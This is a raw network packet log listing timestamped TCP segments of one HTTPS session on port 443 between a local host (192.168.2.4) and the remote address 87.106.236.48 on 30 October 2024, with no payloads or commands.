Oct 30, 2024 19:47:18.711010933 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.711025000 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.711070061 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.711076975 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.711091042 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.711112976 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.711863041 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.711879969 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.711926937 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.711935043 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.711946011 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.711971998 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.712265968 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.712281942 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.712337017 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.712344885 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.712380886 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.712892056 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.712904930 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.712956905 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.712965965 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.713004112 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.713372946 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.713388920 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.713448048 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.713454008 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.713493109 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.714062929 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.714076996 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.714131117 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.714138985 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.714175940 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.714644909 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.714662075 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.714703083 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.714709997 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.714721918 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.714746952 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.715002060 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.715018034 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.715070009 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.715078115 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.715115070 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.715951920 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.715965986 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.716022968 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.716031075 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.716063023 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.716427088 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.716440916 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.716480017 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.716486931 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.716500044 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.716525078 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.716900110 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.716914892 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.716960907 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.716968060 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.716985941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.717009068 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.751965046 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.751981020 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.752026081 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.752036095 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.752046108 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.752074003 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.794853926 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.794869900 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.794910908 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.794926882 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.794956923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.794956923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.832257986 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.832277060 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.832325935 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.832339048 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.832376003 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.832834005 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.832848072 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.832884073 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.832890034 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.832916975 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.832933903 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.833340883 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.833353996 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.833385944 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.833393097 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.833416939 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.833430052 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.833980083 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.833993912 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.834028959 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.834033966 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.834054947 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.834074974 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.834353924 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.834367037 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.834400892 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.834407091 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.834430933 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.834449053 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.835026979 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.835038900 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.835087061 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.835093975 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.835134983 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.835628033 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.835644007 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.835680962 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.835686922 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.835700035 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.835724115 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.836246967 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.836261988 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.836308002 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.836316109 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.836354971 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.836764097 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.836780071 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.836817026 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.836826086 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.836855888 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.836873055 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.837208986 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.837228060 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.837260962 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.837268114 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.837294102 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.837311029 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.837641954 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.837655067 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.837712049 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.837718964 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.837740898 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.837759018 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.838179111 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.838195086 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.838229895 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.838238001 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.838268995 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.838283062 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.838303089 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.838308096 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.838320017 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.838334084 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.838372946 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.840087891 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.840101957 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.840159893 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.840167046 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.840184927 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.840204954 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.840388060 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.840400934 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.840455055 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.840461969 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.840497017 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.840879917 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.840895891 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.840945959 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.840955019 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.840979099 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.840992928 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.875294924 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.875317097 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.875372887 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.875382900 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.875436068 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.918395996 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.918415070 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.918518066 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.918528080 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.918571949 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.956048012 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.956064939 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.956129074 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.956140995 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.956177950 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.956403017 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.956418037 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.956449986 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.956455946 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.956486940 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.956504107 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.956965923 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.956983089 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.957043886 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.957051039 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.957088947 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.957396984 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.957413912 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.957480907 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.957488060 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.957525015 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.957918882 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.957933903 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.957994938 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.958002090 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.958039045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.958414078 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.958429098 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.958463907 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.958470106 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.958498001 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.958519936 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.958781004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.958794117 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.958842993 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.958851099 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.958901882 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.959297895 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.959311008 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.959362030 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.959368944 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.959394932 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.959420919 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.959731102 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.959749937 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.959798098 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.959805965 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.959834099 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.959847927 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.960227966 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.960242033 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.960309982 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.960316896 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.960359097 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.960905075 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.960921049 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.960962057 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.960971117 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.960997105 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.961016893 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.961199045 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.961211920 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.961261988 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.961267948 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.961302042 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.961837053 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.961852074 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.961884975 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.961890936 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.961920023 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.961936951 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.967600107 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.967616081 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.967679024 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.967685938 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.967722893 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.968148947 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.968163967 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.968224049 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.968230009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.968267918 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.968271971 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.968282938 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.968314886 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.968324900 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.968332052 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.968372107 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.968802929 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.968815088 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.968863964 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.968872070 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.968909025 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.999491930 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.999509096 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.999560118 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.999568939 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.999598026 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.999619961 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.043030024 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.043047905 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.043088913 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.043097973 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.043143988 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.079483032 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.079509020 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.079559088 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.079571962 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.079619884 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.079930067 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.079945087 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.080007076 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.080014944 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.080053091 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.080287933 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.080305099 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.080352068 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.080358982 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.080399036 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.080899000 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.080914974 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.080975056 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.080981970 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.081018925 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.081377029 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.081393003 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.081448078 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.081455946 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.081494093 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.082199097 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.082214117 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.082269907 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.082277060 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.082313061 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.082485914 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.082499981 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.082547903 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.082556963 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.082597017 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.082914114 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.082927942 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.082986116 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.082998037 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.083034039 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.083553076 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.083570004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.083621025 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.083628893 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.083666086 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.083914042 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.083931923 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.083980083 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.083986998 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.084031105 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.084280014 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.084292889 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.084353924 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.084362030 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.084414959 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.084871054 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.084897041 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.084949017 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.084955931 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.084992886 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.085555077 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.085570097 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.085627079 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.085633993 CET	443	49731	87.106.236.48	192.168.2.4
